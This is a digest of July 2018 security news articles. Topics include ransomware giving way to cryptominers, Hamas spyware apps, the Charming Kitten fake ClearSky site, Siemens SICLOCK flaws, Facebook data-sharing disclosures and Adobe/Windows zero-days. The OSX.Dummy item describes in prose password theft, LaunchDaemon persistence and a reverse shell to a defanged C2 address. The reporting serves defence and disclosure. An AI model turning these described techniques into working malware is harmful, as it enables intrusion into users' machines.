Ransomware and malicious crypto miners in 2016-2018
4.7.2018 Kaspersky
Ransomware
KSN Report: Ransomware and malicious cryptominers 2016-2018

Ransomware is not an unfamiliar threat. For the last few years it has been affecting the world of cybersecurity, infecting and blocking access to various devices or files and requiring users to pay a ransom (usually in Bitcoins or another widely used e-currency), if they want to regain access to their files and devices.

The term ransomware covers two main types of malware: so-called window blockers (which block the OS or browser with a pop-up window) and cryptors (which encrypt the user’s data). The term also encompasses select groups of Trojan-downloaders, namely those that tend to download encryption ransomware once a PC is infected.

Kaspersky Lab has a tradition of reporting on the evolution of ransomware – and you can find previous reports on the threat here and here.

This year, however, we came across a huge obstacle in continuing this tradition. We have found that ransomware is rapidly vanishing, and that cryptocurrency mining is starting to take its place.

The architecture of cryptocurrencies assumes that, in addition to purchasing cryptocurrency, a user can create a new currency unit (or coin) by harnessing the computational power of machines that have specialized ‘mining’ software installed on them.

Cryptocurrency mining is the process of creating these coins – it happens when various cryptocurrency transactions are verified and added to the digital blockchain ledger. The blockchain, in its turn, is a chain of successive blocks holding recorded transactions such as who has transferred bitcoins, how many, and to whom. All participants in the cryptocurrency network store the entire chain of blocks with details of all of the transactions that have ever been made, and participants continuously add new blocks to the end of the chain.

Those who add new blocks are called miners, and in the Bitcoin world, as a reward for each new block, its creator currently receives 12.5 Bitcoins. That’s approximately $30,000 according to the exchange rate on July 1, 2017. You can find out more about the mining process here.

Given the above, this report will examine what is hopefully ransomware’s last breath, in detail, along with the rise of mining. The report covers the period April 2017 to March 2018, and compares it with April 2016 – March 2017.

Main findings
The total number of users who encountered ransomware fell by almost 30%, from 2,581,026 in 2016-2017 to 1,811,937 in 2017-2018;
The proportion of users who encountered ransomware at least once out of the total number of users who encountered malware fell by around 1 percentage point, from 3.88% in 2016-2017 to 2.80% in 2017-2018;
Among those who encountered ransomware, the proportion who encountered cryptors fell by around 3 percentage points, from 44.6% in 2016-2017 to 41.5% in 2017-2018;
The number of users attacked with cryptors almost halved, from 1,152,299 in 2016-2017 to 751,606 in 2017-2018;
The number of users attacked with mobile ransomware fell by 22.5% from 130,232 in 2016-2017 to 100,868 in 2017-2018;
The total number of users who encountered miners rose by almost 44.5% from 1,899,236 in 2016-2017 to 2,735,611 in 2017-2018;
The share of miners detected, from the overall number of threats detected, also grew from almost 3% in 2016-2017 to over 4% in 2017-2018;
The share of miners detected, from overall risk tool detections, is also on the rise – from over 5% in 2016-2017 to almost 8% in 2017-2018;
The total number of users who encountered mobile miners also increased – but at a steadier pace, growing by 9.5% from 4,505 in 2016-2017 to 4,931 in 2017-2018.


Israel Accuses Hamas of Targeting Soldiers With World Cup App
4.7.2018 securityweek BigBrothers

Tel Aviv - Israeli military intelligence on Tuesday accused Hamas hackers of creating a World Cup app and two online dating sites to tempt soldiers into downloading spyware onto their phones.

Briefing journalists at national defence headquarters in Tel Aviv, army intelligence officers said the scam by members of the Palestinian Islamist movement that runs the Gaza Strip failed to damage military security.

"No damage was done, as we stopped it in time," one of the officers said, with the military's response codenamed "Operation Broken Heart".

But he said the attempt showed the Islamist militants had adopted new tactics since a similar attempt was revealed in January 2017.

The emphasis then was solely on the dating game, with the hackers posing online as attractive young women seeking to lure men in uniform into long chats.

This time the traps were aimed at both sexes and there was the additional bait of World Cup action with an app offering "HD live streaming of games, summaries and live updates".

Attackers used stolen identities to create more convincing fake Facebook profiles of young Israelis, written in fluent Hebrew studded with current slang.

"What Hamas is bringing to the table is a very good knowledge of our young people and their state of mind," another officer said. Asked how he could be sure Hamas was behind the online offensive, he declined to say but insisted there was no doubt.

The assailants uploaded their custom-built Golden Cup, Wink Chat and Glance Love applications to the Google Store, to make them seem legitimate, according to the officers.

Using Facebook sharing and Whatsapp messages, they urged young men and women performing Israel's compulsory military service to download the infected apps.

Once on the recipient's phone, officers said, the device could be taken over to covertly take and send photographs, eavesdrop on conversations, copy stored files and pictures and transmit location details.

But in most cases, they said, soldiers did not download the apps and informed their superiors of their suspicions.

Google has since deleted the apps from its store, they added.

They said that awareness of the potential risk had soared since the army publicised the previous attempts.

"Thanks to the soldiers' vigilance, Hamas' intelligence infrastructure was exposed before it caused actual security damage," army briefing notes said. Israel and Palestinian militants in Gaza have fought three wars since 2008.

In March 2016 a Palestinian from Gaza was charged with hacking into Israeli military drones.


New macOS Malware Targets Crypto-Currency Users
4.7.2018 securityweek Apple

A new piece of macOS malware has been observed being distributed via crypto-currency related Slack or Discord chat groups, security researchers warn.

First detailed late last month, the malware is being distributed by malicious actors who impersonate admins or key people. The actors share small snippets of code with the members of said chat groups, and attempt to convince them into running the code in a terminal.

Upon execution of the code, a malicious binary is downloaded and executed onto the victim’s machine. Although the social engineering trick isn’t as sophisticated, some users apparently fall for it.

The downloaded payload is rather large, at 34MB. As of Friday, the malware wasn’t being detected by any of the 60 anti-virus engines in VirusTotal, Remco Verhoef, ISC Handler and Founder of DutchSec, explains.

The malicious binary is not signed and Gatekeeper would normally flag and block it, but it appears that Apple’s protection measure does not work for files that are executed directly via terminal commands.

The reason the binary is so large is that the author apparently packed in it libraries such as OpenSSL and V8, Objective-See’s Patrick Wardle, who named the malware OSX.Dummy, points out.

When executed on the target machine, the malware first sets the script to be owned as root. When the threat executes sudo to change the file’s permissions, the user is prompted to enter their password in the terminal, and the malware steals it and saves it to /tmp/dumpdummy.

Next, OSX.Dummy sets the script to be executable via chmod +x, moves the script to a new directory, dumps a plist file to /tmp/com.startup.plist and then moves it to the LaunchDaemons directory, sets the owner of the file to root, and then launches the plist launch daemon, for persistency.

At this point, the malware has ensured that the malicious script is automatically executed by the OS whenever the system is rebooted.

The Python script, the security researchers discovered, attempts to connect to 185.243.115[.]230 on port 1337, then “duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it's setting up an interactive reverse shell,” Wardle notes.

Once the connection to the remote command and control (C&C) server is established, the attacker can execute arbitrary commands on the infected machine, as root.

The malware’s capabilities, however, are limited, and every step of the infection process is rather trivial to detect, Wardle says.


Flaws Expose Siemens Central Plant Clocks to Attacks
4.7.2018 securityweek
Vulnerebility

Siemens informed customers on Tuesday that some of its SICLOCK central plant clocks are affected by several vulnerabilities, including ones that have been rated “critical.”

Siemens SICLOCK devices are used to synchronize time in industrial plants. The central plant clock ensures stability in case of a failure or loss of reception at the primary time source.

According to the German industrial giant, SICLOCK systems are affected by a total of six vulnerabilities. The security holes have been assigned the CVE identifiers CVE-2018-4851 through CVE-2018-4856.

Siemens SICLOCK vulnerabilities

Three of the flaws have been classified as critical. One of them allows an attacker with access to the network to cause the targeted device to enter a denial-of-service (DoS) condition – and possibly reboot – by sending it specially crafted packets.

“The core functionality of the device could be impacted. The time serving functionality recovers when time synchronization with GPS devices or other NTP servers are completed,” Siemens wrote in its advisory. “The vulnerability could impact the availability of the device, and could impact the integrity of the time service functionality of the device.”

Another critical vulnerability can be exploited by an attacker with access to UDP port 69 to modify the firmware on a targeted SICLOCK device. Access to the same port is also required for the exploitation of a different critical flaw that allows an attacker to modify the administrative client stored on the device and execute arbitrary code.

A high severity flaw disclosed by Siemens can allow a network attacker to bypass authentication, but exploitation requires the hacker to obtain specific information about the targeted device.

Siemens SICLOCK vulnerabilities

The remaining security holes are a medium severity issue that allows a man-in-the-middle (MitM) attacker to intercept unencrypted passwords stored in client configuration files, and a low severity bug that can be exploited by an attacker with admin access to the management interface to lock out legitimate users.

Four of the six vulnerabilities can be exploited without any user interaction. Siemens says it’s not aware of any instances where these flaws have been exploited for malicious purposes.

The impacted products are SICLOCK TC100, which is designed for smaller plants, and SICLOCK TC400. Since both products are in the process of being phased out, Siemens has not released any firmware updates, and instead advised customers to apply a series of workarounds and mitigations that should reduce the risk of attacks.

Mitigations include the installation of redundant time sources and implementation of plausibility checks for critical controllers in the plant, and protecting network access to impacted devices.


Iranian Hackers Impersonate Israeli Security Firm
4.7.2018 securityweek BigBrothers

A group of Iranian hackers focused on cyber-espionage recently built up a website to impersonate ClearSky Cyber Security, the Israeli firm that exposed their activities not long ago.

The hackers, tracked as APT35 and also known as NewsBeef, Newscaster, and Charming Kitten, have been active since at least 2011, with their activities detailed for the first time several years ago.

In December 2017, ClearSky Cyber Security published a report detailing the group’s activities during the 2016-2017 timeframe. The security firm not only described the actor’s infrastructure, but also provided information on DownPaper, a new piece of malware the hackers had been using.

The security firm exposed the link between the group and Behzad Mesri, also known as Skote Vahshat, who was charged in November 2017 with the hacking of HBO. Furthermore, the researchers also managed to establish the identity of two other alleged members of the group.

Roughly half a year after the report was published, the security firm announced on its Twitter account that the hackers built their own site impersonating ClearSky.

“#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com),” the security firm announced.

The advanced persistent threat (APT) apparently copied entire pages from the legitimate website, but also changed one of them to include a sign in option with multiple services. Anyone entering credentials there would have had them sent to the actor instead.

“These sign in options are all phishing pages that would send the victim's credentials to the attackers. Our legitimate website does not have any sign in option. It seems that the impersonating website is still being built because some of the pages have error messages in them,” the security firm announced.

One of the pages on the fake website, the security researchers discovered, featured content related to a Charming Kitten campaign that ClearSky exposed only several weeks ago. That page, however, wasn’t customized to look like the security firm’s website.

The fake website started being flagged as deceptive soon after ClearSky discovered it. The security firm says that its employees, services, and customers were not affected.

Over the past years, security researchers managed to link various hacking groups to Iran, including APT33, Rocket Kitten, Magic Hound, and CopyKittens, and even revealed that they tend to share infrastructure and malware code.


Data Security Startup Enveil Unveils Homomorphic Encryption Platform
4.7.2018 securityweek Crypto

Enveil's New "ZeroReveal" Platform Enables Homomorphic Encryption to Secure Data in Use

Sensitive data exposure is classified by OWASP as the third most critical web application vulnerability. Encryption is the primary solution. But encryption is only generally available for data at rest and data in transit -- leaving the third state of data (data in use) potentially exposed. Bank card details, for example, can be stored encrypted and can be transmitted encrypted -- but they currently must be decrypted and exposed at the point of processing.

Finding some way for data to remain encrypted and secure even during processing is considered the holy grail of encryption. One method, homomorphic encryption, was first mooted in 1978; but initially without any clear proof that it was possible. Today, start-up firm Enveil has launched the first practical and scalable commercial homomorphic encryption platform, ZeroReveal.

EnveilThe core technology originates from within the NSA. Enveil's CEO and founder, mathematician Ellison Anne Williams, worked on the project within the NSA as a senior researcher for 12 years. When she left in 2015 she took the technology with her, exclusively, and founded Enveil in 2016. Since then, Enveil has expanded and matured the core technology to the point of launching a commercial product.

"Continued reports of chip flaws [eg, Spectre and Meltdown] and data breaches in recent months make it clear that encrypting data at rest and in transit isn't good enough in today's volatile security environment. Organizations must eliminate the data in use security gap and do so in a way that won't negate investments in existing systems and protocols," explains Williams. "We allow you to securely use data where it is and as it is today, delivering nation-state level security -- no system overhaul required."

When people use data, it is typically undertaken by running a search or analytic over the data. Enveil concentrates on the security posture of that search or analytic as it is being performed.

"We have two-party form factor," Williams told SecurityWeek. "From a technology standpoint, it means that we can take a search or analytic that folks will want to perform over data, and we can encrypt that, and then we can run that encrypted search over massive amounts of data anywhere, without ever decrypting anything. We never decrypt the search itself, and if the underlying data also happens to be encrypted, we don't have to decrypt that either. We accomplish this through the ZeroReveal Compute Fabric where we can encrypt the search, send that out to the data location, and that can be processed there without ever being decrypted."

This is made possible by the magic math known as homomorphic encryption. "It's been around for a while," continued Williams, "and a lot of work has gone into it. It allows you to perform operations on encrypted data as if it were unencrypted data. This is powered by the mathematical nature of homomorphic encryption. Until now it has remained computationally intensive and not practical. Our major breakthrough has been moving this holy grail from the realm of the theoretical to the realm of the practical."

ZeroReveal solves very specific use cases. "How do I go and encrypt my most sensitive data and put it securely in the cloud," said Williams, "but yet still be able to process it in its encrypted state in the cloud platform? It has become practical because of advances in the way that we use the homomorphic encryption rather than simply massive increases in compute power."

One of ZeroReveal's great strengths is that it works on existing encrypted data -- the secret resides in the homomorphically encrypted search or analytic. "We sit above the storage technology," she said. "People don't have to change the mechanism of storage or how they currently encrypt their data. This is what is new. In traditional homomorphic systems, you must have the data itself encrypted homomorphically to operate on it. We don't do that at all. It's because we're looking for bit matches rather than character matches in the underlying data. It allows us to search across any data store, encrypted or unencrypted, and encrypted with any crypto and even graphics -- it's all represented by the bit values that we search on."

The use cases are already extensive, and will only grow with the increase of big data aggregators. Consider, for example, a third-party aggregation of financial data. The very act of searching that data for specific information can highlight confidential considerations of potential M&A activity. But with the search encrypted (irrespective of whether or how the big data itself is encrypted), no outside party will know what the query was.

It would allow health organizations to anonymize and encrypt personal health data, and allow researchers to analyze the data without it ever having to be decrypted. It would allow staff to work on sensitive data from home -- or anywhere -- over the weekend without having to decrypt and copy the data to a laptop. And it clearly has huge potential to protect both data owners and data processors concerned about GDPR.

"The range of potential use cases for homomorphic encryption is vast," says Garrett Bekker, principal analyst, Information Security at 451 Research. "By focusing on the encryption-in-use space, Enveil complements data-at-rest and data-in-motion encryption to fill a gap in the overall data security landscape."

Fulton, Maryland-based Enveil was founded in 2016 by Ellison Anne Williams. It raised $4 million from investors including Bloomberg, Thomson Reuters, USAA, In-Q-Tel and DataTribe. The firm focuses solely on securing data in use, and works seamlessly with existing investments in securing data at rest and data in transit.


Iranian Charming Kitten ATP group poses as Israeli cybersecurity firm in phishing campaign
3.7.2018 securityaffairs APT

Iranian APT groups continue to very active, recently Charming Kitten cyber spies attempted to pose as an Israeli cyber-security firm that uncovered previous hacking campaigns.
The Iranian Charming Kitten ATP group, aka Newscaster or Newsbeef, launched spear phishing attacks against people interested in reading reports about it.

The Newscaster group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Iranian Hackers used a network of fake accounts (NEWSCASTER network) on principal social media to spy on US officials and political staff worldwide, this is reported in an analysis done by iSIGHTPartners. The Charming Kitten group is also known for the abuse of Open Source Security Tools, including the BeEF.

The threat actor targeted numerous entities in Iran, the U.S., Israel, the U.K. and other countries. The hackers also hit individuals involved in academic research, human rights, and the media.

ClearSky detailed the group’s activities during 2016-2017, the report includes information related to the infrastructure used by the APT and to a new strain of malware dubbed DownPaper.

The report also linked the hacker behind the HBO security breach to the Charming Kitten, and reveals the identities of two other alleged members of the group.

Recently the experts from the Israeli cyber-security firm ClearSky Security, discovered that Charming Kitten APT creates a rogue copy (clearskysecurity.net ) of the official website of the company (clearskysec.com).

Charming Kitten

“Charming Kitten built a phishing website impersonating our company,” stats ClearkSky. “They copied pages from our public website and changed one of them to include a ‘sign in’ option with multiple services.”

“These sign-in options are all phishing pages that would send the victim’s credentials to the attackers,” ClearSky said. “Our legitimate website does not have any sign in option.”

ClearSky Cyber Security
@ClearskySec
#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com ). They copied pages from our public website and changed one of them to include a "sign in" option with multiple services.

4:15 PM - Jul 1, 2018
103
106 people are talking about this
Twitter Ads info and privacy
The experts believe they have discovered the rogue website while the Iranian APT was still working on it.

“It seems that the impersonating website is still being built because some of the pages have error messages in them,” ClearSky added.

The experts discovered that the fake clearskysecurity.net domain was hosted on a server that was associated with the Charming Kitten APT by ClearSky last month.

View image on TwitterView image on TwitterView image on TwitterView image on Twitter

ClearSky Cyber Security
@ClearskySec
Potentially #CharmingKitten put BeEF in The Jewish Journal, and set up fake domains of Deutsche Welle (Germany's public international broadcaster) and Frost&Sullivan:

jewishjournal\.us
deutcshewelle\.org
deutcshewelle\.com
frostsullivan\.org

More:https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.q59o3v69qjhh …

9:57 AM - Jun 12, 2018
29
30 people are talking about this
Twitter Ads info and privacy
The server was still hosting content from previous campaigns, a further clue that link it to the Iranian hacker group.

The website appears still under development, it is likely it was not yet involved in any hacking campaign.

As the website was not finished, ClearSky doesn’t believe the Iranian hackers managed to phish anyone yet. The website was taken down after a few hours of its discovery.

Iranian hackers are becoming even more aggressive even if experts believe that they are not particularly sophisticated.

Recently we discussed the OilRig gang has been using a new Trojan in attacks aimed at targets in the Middle East.

OilRig is just one of the Iran-linked hacker crews, other groups tracked by security experts are APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten (aka Newscaster and NewsBeef) and CopyKittens.


The Social network giant Facebook confirms it shared data with 61 tech firms after 2015
3.7.2018 securityaffairs
Social

On Friday, Facebook provided a 748-page long report to Congress that confirms the social network shared data with at least 61 tech firms after 2015.
This is the worst period in the history of the social network, now Facebook admitted to having shared users’ data with 61 tech firms.

The problem is that Facebook allowed tech companies and app developers to access its users’ data after announcing it had restricted third-party firms to access its data in 2015.

Immediately after the Cambridge Analytica privacy scandal that affected 87 million users, Facebook attempted to mitigate the pressure of the media by confirming that it already restricted third-party access to its users’ data since May 2015.

On Friday, Facebook provided a 748-page long report to Congress that confirms the practice of sharing data with 61 tech firms after 2015.

The company also granted a “one-time” six-month extension to the companies to come into compliance with Facebook’s new privacy policy.

“In April 2014, we announced that we would more tightly restrict our platform APIs to
prevent abuse. At that time, we made clear that existing apps would have a year to transition—at which point they would be forced (1) to migrate to the more restricted API and (2) be subject to Facebook’s new review and approval protocols.” reads the report.

“The vast majority of companies were required to make the changes by May 2015; a small number of companies (fewer than 100) were given a one-time extension of less than six months beyond May 2015 to come into compliance.”

In addition, the company admitted that a very small number of companies (fewer than 10) have had access to limited friends’ data as a result of API access that they
received in the context of a beta test.

The social media firm also shared a list containing 52 companies that it has authorized to build versions of Facebook or Facebook features for their devices and products.

The list includes Acer, Amazon, Apple, Blackberry, Microsoft, Motorola/Lenovo, Samsung, Sony, Spotify, and the Chinese companies Huawei and Alibaba.

“The partnerships—which we call “integration partnerships”—began before iOS and
Android had become the predominant ways people around the world accessed the internet on their mobile phones. ” explained Facebook.

“We engaged companies to build integrations for a variety of devices, operating systems, and other products where we and our partners wanted to offer people a way to receive Facebook or Facebook experiences,” the document reads. “These integrations were built by our partners, for our users, but approved by Facebook.”

The social network firm confirmed it has already interrupted 38 of these 52 partnerships and additional seven will be discontinued by the end of July, and another one by the end of this October. The company will continue the partnership with Tobii, an accessibility app that enables people with ALS to access Facebook, Amazon, Apple, Mozilla, Alibaba and Opera.

“Three partnerships will continue: (1) Tobii, an accessibility app that enables people with ALS to access Facebook; (2) Amazon; and (3) Apple, with whom we have agreements that extend beyond October 2018. We also will continue partnerships with Mozilla, Alibaba and Opera— which enable people to receive notifications about Facebook in their web browsers—but their integrations will not have access to friends’ data.” added the company.

Privacy advocated and security experts defined as questionable the way the social network managed users’ data, especially after 2015.

Just a few days ago, I reported the news that a popular third-party quiz app named NameTests was found exposing data of up to 120 million Facebook users.


Facebook is notifying 800,000 users affected by a blocking bug
3.7.2018 securityaffairs
Social

Yesterday the social network giant Facebook started notifying 800,000 users affected by a blocking bug. The company has already fixed it.
When a Facebook user blocks someone, the blocked user will be not able to interact with him, this means that he will not see his posts, it will not able to start conversations on Messenger or add him as a friend. The blocked user may have also been able to contact the blocker via Messenger.

Facebook discovered a bug affecting its platform that allowed blocked users to interact with the accounts that decided to block them. As result, blocked users were able to see some of the content posted by individuals who had blocked them.

The issue was introduced on May 29, and the social network giant addressed it on June 5.

“Starting today we are notifying over 800,000 users about a bug in Facebook and Messenger that unblocked some people they had blocked. The bug was active between May 29 and June 5 — and while someone who was unblocked could not see content shared with friends, they could have seen things posted to a wider audience. For example pictures shared with friends of friends. ” wrote Facebook Chief Privacy Officer Erin Egan.

According to Egan, one a user has been blocked will not see content shared only with friends, but he may have been shown content shared with “friends of friends.

Egan clarified that blocking also automatically unfriends users if they were previously friends.

Below the details shared by Egan on this specific bug.

It did not reinstate any friend connections that had been severed;
83% of people affected by the bug had only one person they had blocked temporarily unblocked; and
Someone who was unblocked might have been able to contact people on Messenger who had blocked them.
Facebook has fixed the bug and everyone has been blocked again, the company is sending a notification t the affected accounts encouraging them to check their blocked list.

Facebook bug


A Samsung Texting App bug is sending random photos to contacts
3.7.2018 securityaffairs Mobil

Some Samsung devices are randomly sending photos taken with the camera to contacts in the address book without permission.
Do you have a Samsung smartphone? There is something you need to know.

Some devices are randomly sending photos taken with the camera to contacts in the address book without permission.

The problem affected Galaxy S9 and S9+ devices, but we cannot exclude that other devices may have been affected.

The news was first reported by Gizmodo, several users reported the anomalous behavior on Reddit and the company official forums.

“Sending pictures to others is one of the most basic functions of a smartphone, but when your phone’s texting app starts randomly pushing out photos without your knowledge, you got a problem..” reported Gizmodo

“And unfortunately, according to a smattering of complaints on Reddit and the official Samsung forums, it seems that’s exactly what happened to a handful of Samsung phone users, including owners of late model devices such as the Galaxy Note 8 and Galaxy S9.”

One user explained that his phone sent all his photos to his girlfriend over the night, but there was no record of it on his messages app. The expert discovered that there was a record of this activity on the mobile logs.

“Last night around 2:30 am, my phone sent her my entire photo gallery over text but there was no record of it on my messages app. However, there was record of it on tmobile logs. Why would this happen?” wrote the user on Reddit.

The unwanted messages were sent out via the Samsung Messages app, some users discovered the issue after they received a response from the recipients that received the photos.

A Samsung confirmed it is aware of the reports” and that its technical staff is investigating the problem.

samsung s9

Below the list of problems observed since the RCS Messaging was enabled and occurs with the SCHEDULED TEXT feature.

Scheduled Messages are sent prematurely
Scheduled text Messages end up in WRONG threads
Messaging incorrectly displays scheduled messages as “sent” when, in fact, the other party has not received them.
Clearly many users are speculating this glitch was introduced with the push of RCS messaging updates by telco carriers.

As a temporary measure, Samsung owners can revoke Samsung Message’s permissions to access storage (Settings -> Apps -> Samsung Messages -> Permissions -> Storage).

Concerned customers are encouraged to contact us directly at 1-800-SAMSUNG


Mozilla Announces Root Store Policy Update
3.7.2018 securityweek  Security

Mozilla announced on Monday that its Root Store Policy for Certificate Authorities (CAs) has been updated to version 2.6.

The Root Store Policy governs CAs trusted by Firefox, Thunderbird and other Mozilla-related software. The latest version of the policy, discussed by the Mozilla community over a period of several months, went into effect on July 1.

The new Root Store Policy includes nearly two dozen changes and some of the more important ones have been summarized in a blog post by Wayne Thayer, CA Program Manager at Mozilla.

Version 2.6 of the Root Store Policy requires CAs to clearly disclose email address validation methods in their certificate policy (CP) and certification practice statement (CPS). The CP/CPS must also clearly specify IP address validation methods, which have now been banned in specific circumstances.

CAs need to periodically obtain certain audits for their root and intermediate certificates in order to remain in the root store. Mozilla now requires auditors to provide reports written in English.

The new policy also states that starting with January 1, 2019, CAs will be required to create separate intermediate certificates for S/MIME and SSL certificates.

“Newly issued Intermediate certificates will need to be restricted with an EKU extension that doesn’t contain anyPolicy, or both serverAuth and emailProtection. Intermediate certificates issued prior to 2019 that do not comply with this requirement may continue to be used to issue new end-entity certificates,” Thayer explained.

Another new requirement is that root certificates must have complied with the Mozilla Root Store Policy from the moment they were created.

“This effectively means that roots in existence prior to 2014 that did not receive BR audits after 2013 are not eligible for inclusion in Mozilla’s program. Roots with documented BR violations may also be excluded from Mozilla’s root store under this policy,” Thayer said.

Mozilla takes digital certificate management very seriously. Last year it announced taking action against Chinese certificate authority WoSign and its subsidiary StartCom as a result of over a dozen incidents. It also targeted Symantec after the company and its partners were involved in several incidents involving mississued TLS certificates, and later raised concerns over DigiCert’s acquisition of Symantec’s CA business.


Facebook Notifies 800,000 Users of Blocking Bug
3.7.2018 securityweek 
Social

Facebook on Monday started notifying 800,000 users affected by a bug that resulted in blocked individuals getting temporarily unblocked. The social media giant also detailed some new API restrictions designed to better protect user information.

When you block someone on Facebook, you prevent them from seeing your posts, starting conversations on Messenger, or adding you as a friend. However, a Facebook and Messenger bug introduced in May 29 and addressed on June 5 led to users being able to see some of the content posted by individuals who had blocked them.

According to Facebook Chief Privacy Officer Erin Egan, blocked users could not see content shared only with friends, but they may have been shown content shared with “friends of friends.” The blockee may have also been able to contact the blocker via Messenger.

Egan clarified that friend connections were not reinstated as a result of the bug and 83 percent of impacted users had only one blocked person temporarily unblocked. Affected users will see a notification in their account.

New API restrictions and changes

Facebook also announced on Monday additional measures taken following the Cambridge Analytica incident, in which personal data on tens of millions of users was improperly shared with the British political consultancy through an app.

The social media giant previously shared some information on the steps taken to better protect elections and user data, and it has now announced new changes affecting application developers.

Developers have been informed that several APIs have been or will be deprecated, including the Graph API Explorer App, Profile Expression Kit, Trending API, the Signal tool, Trending Topics, Hashtag Voting, Topic Search, Topic Insights, Topic Feed, and Public Figure. The Trending and Topic APIs are part of the Media Solutions toolkit.

Some APIs will be deprecated – including due to low usage – while others will be restricted.

Developers will once again be allowed to search for Facebook pages via the Pages API, but they will need Page Public Content Access permissions, which can only be obtained via the app review process.

As for marketing tools, Facebook announced that the Marketing API can only be used by reviewed apps, and that it’s introducing new app review permissions for the Live Video and Lead Ads Retrieval APIs.


Microsoft revealed that 2 Zero-Days found in March were part of a cyber weapon in an early development stage
3.7.2018 securityaffairs
Vulnerebility

Microsoft published technical details of 2 zero-days that have been recently discovered after someone uploaded a weaponized PDF file to VirusTotal.
Security researchers from Microsoft have published technical details of two zero-day vulnerabilities that have been recently discovered after someone uploaded a weaponized PDF file to VirusTotal.

The two issues were addressed by Microsoft with May 2018 Patch Tuesday before threat actors used it in attacks in the wild.

The first zero-day vulnerability is a remote code execution flaw in Adobe Acrobat and Reader (CVE-2018-4990), the second one is a privilege escalation flaw in Microsoft Windows (CVE-2018-8120).

“The first exploit attacks the Adobe JavaScript engine to run shellcode in the context of that module. The second exploit, which does not affect modern platforms like Windows 10, allows the shellcode to escape Adobe Reader sandbox and run with elevated privileges from Windows kernel memory. ESET provided an analysis of the exploitation routines in the sample PDF.” reads the analysis published by Microsoft.

Microsoft shared the technical details of both the flaw only now because it gave users enough time to update their operating systems and Adobe software.

In late March, experts at ESET analyzed a malicious PDF file that was uploaded on VirusTotal and provided it to the Microsoft security team.

The experts flagged the document “as a potential exploit for an unknown Windows kernel vulnerability.”

The analysis conducted by the Microsoft team revealed that the document includes two different zero-day exploits, one for Adobe Acrobat and Reader and one for Microsoft Windows.

zero-days

According to Microsoft, the weaponized PDF file was in the early development stage, the code used by attackers appeared a PoC code and the weaponized file did not deliver a malicious payload.

“Although the PDF sample was found in VirusTotal, we have not observed actual attacks perpetrated using these exploits. The exploit was in early development stage, given the fact that the PDF itself did not deliver a malicious payload and appeared to be proof-of-concept (PoC) code.” reads the analysis published by Microsoft.

Someone combined the two zero-days to build a very powerful attack vector.

The Adobe Acrobat and Reader exploit is included in the document as a specially crafted JPEG 2000 image that contains the JavaScript exploit code used to trigger a double-free vulnerability in the software to run shellcode.

zero-days

The attackers were trying to chain this exploit with the second Windows kernel exploit to break the Adobe Reader sandbox and run it with elevated privileges.

Once the attacker has exploited the Adobe Reader vulnerability, he will leverage the Window zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privilege of the PE file to run, which is run in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.

The PoC payload used in the sample dropped an empty vbs file in the Startup folder.

“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concluded ESET.

“Even though the sample does not contain a real malicious final payload, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”

Both Microsoft and ESET published technical details of the two zero-days, both firms also shared the IoCs for the exploits.


NSA began deleting all call detail records (CDRs) acquired since 2015
3.7.2018 securityaffairs BigBrothers

NSA is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities.
The US National Security Agency announced it is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities in some data received from telecommunications service providers.

“Consistent with NSA’s core values of respect for the law, accountability, integrity, and transparency we are making public notice that on May 23, 2018, NSA began deleting all call detail records (CDRs) acquired since 2015 under Title V of the Foreign Intelligence Surveillance Act (FISA)” reads the announcement published by the NSA.

“NSA is deleting the CDRs because several months ago NSA analysts noted technical irregularities in some data received from telecommunications service providers. “

Title V of the Foreign Intelligence Surveillance Act (FISA) and the USA Freedom Act of 2015 allow the intelligence agencies to collect call metadata related to certain types of calls involving persons of interest whom activity may pose a threat to the homeland security.

The National Security Agency received more call detail records (CDRs) that it was allowed to retain under the current law framework.

The NSA decided to destroy the data because it was infeasible to identify and isolate properly produced data

“Consequently, NSA, in consultation with the Department of Justice and the Office of the Director of National Intelligence, decided that the appropriate course of action was to delete all CDRs. NSA notified the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice of this decision.” continues the announcement.

The National Security Agency started to delete malformed CDRs on May 23, this year, more than a month ago.

NSA

The intelligence Agency also confirmed to have addressed the root cause of the problem for future CDR acquisitions.

The National Security Agency reported the problem to the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice that notified it to the Foreign Intelligence Surveillance Court.

This isn’t the first time that such kind of incident occurs, civil liberties journalist Marcy Wheeler published last year a catalog for all the times the National Security Agency had violated FISA since the Stellar Wind phone dragnet went under FISA in 2004.


Researchers Create Attacks That Compromise LTE Data Communication
2.7.2018 securityweek Attack

Newly devised attacks on the Long Term Evolution (LTE) high-speed wireless standard break the confidentiality and privacy of communication, a team of researchers claim.

In a newly published paper (PDF), researchers from Ruhr-University Bochum and New York University Abu Dhabi present a set of attacks against LTE’s data link layer (layer two) protocols, which could be used to identify mobile users within a cell, learn what websites the user visits, and even modify the message payload.

A stealthy attacker, the researchers say, could perform an identity mapping attack and map the user’s temporary network identity (TMSI) to the temporary radio identity (RNTI). Both pieces of information are previously unknown to the attacker but are both contained in the radio packets.

“More specifically, we demonstrate how an attacker can precisely localize and identify a user within the cell, distinguish multiple transmission streams, and use this information as a stepping stone for subsequent attacks,” the researchers note.

Using common paging techniques, the researchers were also able to identify and localize specific users for a pre-known TMSI within the cell. This, however, requires the use of an active interface, meaning that the attack becomes detectable.

The researchers also demonstrate that, even for encrypted transmissions, plaintext information up to the Packet Data Convergence Protocol (PDCP) can be accessed, thus de-anonymizing connections otherwise considered secure due to encryption.

